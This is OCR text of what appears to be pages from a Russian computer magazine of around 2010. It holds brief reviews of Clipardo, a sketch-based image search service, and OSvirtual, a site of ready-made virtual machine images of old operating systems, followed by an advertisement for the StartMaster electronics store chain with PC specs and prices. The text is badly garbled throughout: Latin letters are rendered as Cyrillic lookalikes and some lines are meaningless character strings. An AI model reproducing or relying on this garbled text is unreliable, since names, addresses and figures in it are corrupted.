ТЫ* юткс еояьк) ѵоо іо «агсй сіірвгг Ьу ікеГсЫпз 

I Окхтг ѵго іігісН. ні іКс ѵгЬІІг 

1 Ѵоп [кш'Е Ъаѵе Іи Ье ш жѣзі СЦгл.іо рай ленЬ а дкиСсЬ А* уап шг гйііе 1с ікгс 
1 ...по «Л а пнно< 

4 Вгаѵі Ь у М Ъйи. 

5 Укр рякД Ъу 'Етаія 1 ’ сЬескЬах иснЗ дай кг.- кй ЬЯоа 

6 СЬк’СІм'ййжІіП отставая 

7 Гігі 'ЕемеЬ' кіи ™ ж ікЛгЪ ы ггііѵ 

Б СірагА:. ѵ.-і йм! -лкЛ ѵоо тгаД ллй ако сЬе :) 




і\ 


Умный поиск 
изображений по их 
очертанию 


'■"ЗЭЕГ" 





СЫРАРРО 

сіірагсіо.сот 

Когда-то давно в нашем обзоре был сервис для поиска похожих карти- 
нок — ТіпЕуе Зѵѵѵѵѵѵ.ііпеуе.сот Из бета-версии он давно превратился в 
мощный ресурс с огромным количеством пользователей. И вотеще одна 
находка — Сіірагсіо. Смысл втом, что ты сам рисуешь сервису набросок, 
общие очертания предмета, изображение которого ты хочешь найти, 
а сервис... его ищет! Сложно поверить, но это действительно работает. 
Попробуй, например, найти какой-нибудьзнакдорожного движения. 



ОЗѵігШаІ 



РІапеі ССЯМА (октябрь 2009} 

Рінчі И-СЬТДА кжг*Ь 9 ь 2К9І дин ѴѴТЛігі Е 4 лі 



иОС- В 






Йегі Наі Шпик 6.2 

пи мя ишн «г сь.-л дм ѵмэтн в & 



Шч. 




ГЙО ПЩрСО*44 О рЧСррС». ПІДОЛН 



05/8 для РОР-8 

Бсншм 

«Ііиь-чяі * РіМ* ИЕ <№ и™ «с ОМ ^ РВ 



Образы разных операционок 
для запуска под виртуальной 
машиной 



Мас05 9.0.4 



* нега 

* ГІіхгёІ+ьСЫпіН+р 

* ам 



обѵіктуаі. 

озѵИиаІ.пеіѴги 



Если тебе вдруг понадобится гостевая ОС под виртуальной машиной, не 
спеши закачивать дистрибутив и вручную устанавливать ось. На сайте 
ОЗѵіНиаІ собрано немалое количество готовых образов, которыеты мо- 
жешь подгрузить в виртуальную машину и сразу начать работу. Ты едва ли 
здесь найдешьобразы винды или самых последних версий Ыпих’а, а вот 
редкие опера ционки, втом числе десятилетней или даже двадцатилетней 
давности — запросто. Классный сайт для тех, кому интересно вспомнить 
какую-то операционную систему/дистрибутив или познакомиться с новой. 
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ІпіеІ, логотип Іпіеі, ІпІеІ Іпзкіе, Іпіеі Соте и Соге Іпзісіе являются товарными знаками корпорации Іпіеі на территории США и других стран. 



Для 

Г 



отпетых 



I 



еймеров. 




Ищи знак 

Іпіеі 

Іпзісіе® 




Компьютер ЗіагіМазіег Мадпит ЕХЕ 5720 
на базе процессора Іпіеі® Соге™2 ОиасІ 




29990 р- 

.ц е «а»с-ст.«»“" 6л0Л 



• Процессор: Іпіеі® Соге" 2 ОиасІ 08200 (2,33 ГГ ц, 1 333 МГц) 
Видео: ЫѴЮІА ОеРогсе ОТ8250 РСІ-Е 512 МЬ 
Жесткий диск: 1000 СВ 
Оперативная память: 4СВ 
ОС: ѴѴіпсІоѵѵ5 Ѵізіа® Ноте Ргетіит 
ОѴО+РѴѴ, СагсІ Реасіег 



Не забудь купить: 



Беспроводная мышь 
[.одііесН \ѴігеІезз 
Моизе М205 



949 .- 





Накопитель данных 
ѴѴезІегп ОідІІаІ 
РаззрогІ т “ЕззепІіаГ“ 

118В 2.0 2.5 м 320СЬ 



2690 .- 




Видеокарта 
2оІас СР 250СТ8 

РСІ-Е РЭРЗ 256Ы1 512МЬ 



4666 .- 




На правах рекламы. Цены указаны на 20.01.2010. Товар сертифицирован. 



Все для домашних развлечений: компьютеры, ноутбуки, фото- и видеотехника. ТВ. мобильные телефоны, игровые приставки, аксессуары. 



іени* 



С и * Ка 

% 



&/о СЕТЬ МАГАЗИНОВ 

I I г щ ілпл/ѵѵ.зіагітазіег.т 



Скидка действует в день рождения, 
5 дней до и 5 дней после Вашего дня рождения. 
Для получения скидки Вам необходимо предъявить паспорт. 

•скидки по акциям не суммируются бонусные баллы по карге тподо.гѵ не начисляются, скидка не 
распространяется па специальные предложения и тоаары распродажи, уценки. 

Настройка и установка ПО 



звонок бесплатный 

8-800-555-8555 



ѵѵѵѵѵѵ.зіагітазіег.т единая справочная 



Сеть магазинов цифровой электроники СтартМастер: 



> Москва :• Московская область Санкт-Петербург > Ростов-на-Дону 

> Новокузнецк > Барнаул > Кемеровская область > Алтайский Регион 

Адреса магазинов уточняйте на ѵѵшѵ.зіагітазіег.ги или по телефону единой справочной. 



КРЕДИТ, ПРИЁМ ПЛАТЕЖЕЙ без комиссий 









